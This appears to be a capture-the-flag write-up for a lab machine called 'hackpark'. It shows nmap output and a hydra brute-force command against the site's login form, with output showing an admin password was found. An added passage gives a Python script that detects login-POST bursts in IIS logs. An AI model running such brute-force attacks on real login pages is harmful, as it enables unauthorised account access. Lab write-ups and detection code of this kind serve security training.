PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl Microsoft SChannel TLS
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-01-18T03:57:40
|_Not valid after: 2022-07-20T03:57:40
|_ssl-date: 2022-01-19T03:59:53+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:64:86:26:8A:A3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms ip-10-10-202-97.eu-west-1.compute.internal (10.10.202.97)
Using hydra to crack the password for the login form.
Cracking the password with Burp Suite and hydra.
Intercept the login traffic with the Burp Suite proxy and observe what's going on.
I could tell that the request was a POST and needed some parameters to complete.
Hydra requires the ^USER^ and ^PASS^ placeholders along with the login-failed string (you could use -s to show the success pattern, too), so I modified the command as shown below.
hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.202.97 \
http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CKEpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4vHBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra (http://www.thc.org/thc-hydra) starting at 2022-01-19 04:53:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.202.97:80//Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CKEpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4vHBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 736.00 tries/min, 736 tries in 00:01h, 14343662 to do in 324:49h, 16 active
[80][http-post-form] host: 10.10.202.97 login: admin password: PASS_WORD
[STATUS] attack finished for 10.10.202.97 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-01-19 04:55:38
This gave me the password for admin login.
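A defender-side counterpart to the brute-force run above, added here as an example (it is not from the original writeup, hydra or BlogEngine): parse IIS W3C logs and flag any client POSTing to /Account/login.aspx more than a set number of times within one clock minute. The log lines are constructed, and the field layout is the default IIS W3C set I assume here; note that IIS records every failed attempt as a 200 (the login page simply re-renders with "Login failed"), so the per-source rate, not the status code, is the signal.

```python
from collections import Counter

LOGIN_PATH = "/Account/login.aspx"   # the form the hydra run above targeted


def parse_iis_w3c(text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields: header."""
    fields, records = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("log data appears before a #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def login_post_bursts(records, threshold=20):
    """Return {(client_ip, 'YYYY-MM-DD HH:MM'): count} for every client that sent
    at least `threshold` POSTs to the login page inside one clock minute."""
    counts = Counter()
    for r in records:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == LOGIN_PATH.lower():
            minute = r["date"] + " " + r["time"][:5]
            counts[(r["c-ip"], minute)] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


def build_sample_log():
    """Constructed sample: two benign requests, then a 40-request burst from one client."""
    header = ("#Software: Microsoft Internet Information Services 8.5\n"
              "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
              "cs-username c-ip cs(User-Agent) sc-status\n")
    lines = [
        "2022-01-19 04:52:10 10.10.202.97 GET /archive.aspx - 80 - 10.10.10.5 Mozilla/5.0 200",
        "2022-01-19 04:52:15 10.10.202.97 POST /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.10.5 Mozilla/5.0 302",
    ]
    for i in range(40):  # failed attempts still come back as 200, one per second
        lines.append(f"2022-01-19 04:53:{i:02d} 10.10.202.97 POST /Account/login.aspx "
                     f"ReturnURL=/admin/ 80 - 10.10.10.9 Mozilla/4.0 200")
    return header + "\n".join(lines) + "\n"


if __name__ == "__main__":
    for (ip, minute), n in login_post_bursts(parse_iis_w3c(build_sample_log())).items():
        print(f"{minute} {ip}: {n} login POSTs in one minute")
```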
Once you log in, the next step is to identify the version of the web application and check whether there is a known exploit for it.